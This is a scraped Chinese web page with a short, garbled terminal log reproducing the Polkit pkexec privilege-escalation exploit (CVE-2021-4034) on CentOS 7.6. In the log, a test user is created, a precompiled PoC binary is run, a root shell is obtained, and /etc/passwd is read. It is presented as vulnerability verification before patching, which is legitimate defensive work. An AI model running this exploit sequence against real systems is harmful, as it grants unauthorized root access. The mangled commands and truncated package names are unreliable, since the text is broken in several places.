2024年2月3日发(作者:)
版本漏洞验证通过以下命令可查看Polkit是否为安全版本[root@node01 ~]# rpm -qa 7_9.1.x86_64漏洞复现POC--修复前[root@node02 ~]# cat /etc/redhat-release
CentOS Linux release 7.6.1810 (Core)
[root@node02 ~]# uname -aLinux node02 7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux[root@node02 ~]# rpm -aq | grep 7.x86_7.x86_64[root@node02 ~]# useradd liangliang[root@node02 ~]# passwd liangliangChanging password for user password:
Retype new password:
passwd: all authentication tokens updated successfully.[root@node02 ~]# cve-2021-4034-poc[root@node02 ~]# cp cve-2021-4034-poc /home/liangliang/[root@node02 ~]# chmod 755 /home/liangliang/cve-2021-4034-poc
[root@node02 ~]# su - liangliang[liangliang@node02 ~]$ ./cve-2021-4034-poc
sh-4.2#
sh-4.2#
sh-4.2# iduid=0(root) gid=0(root) groups=0(root),2334(liangliang)sh-4.2# cat /etc/passwd
本文发布于:2024-02-03 21:22:08,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170696652851333.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
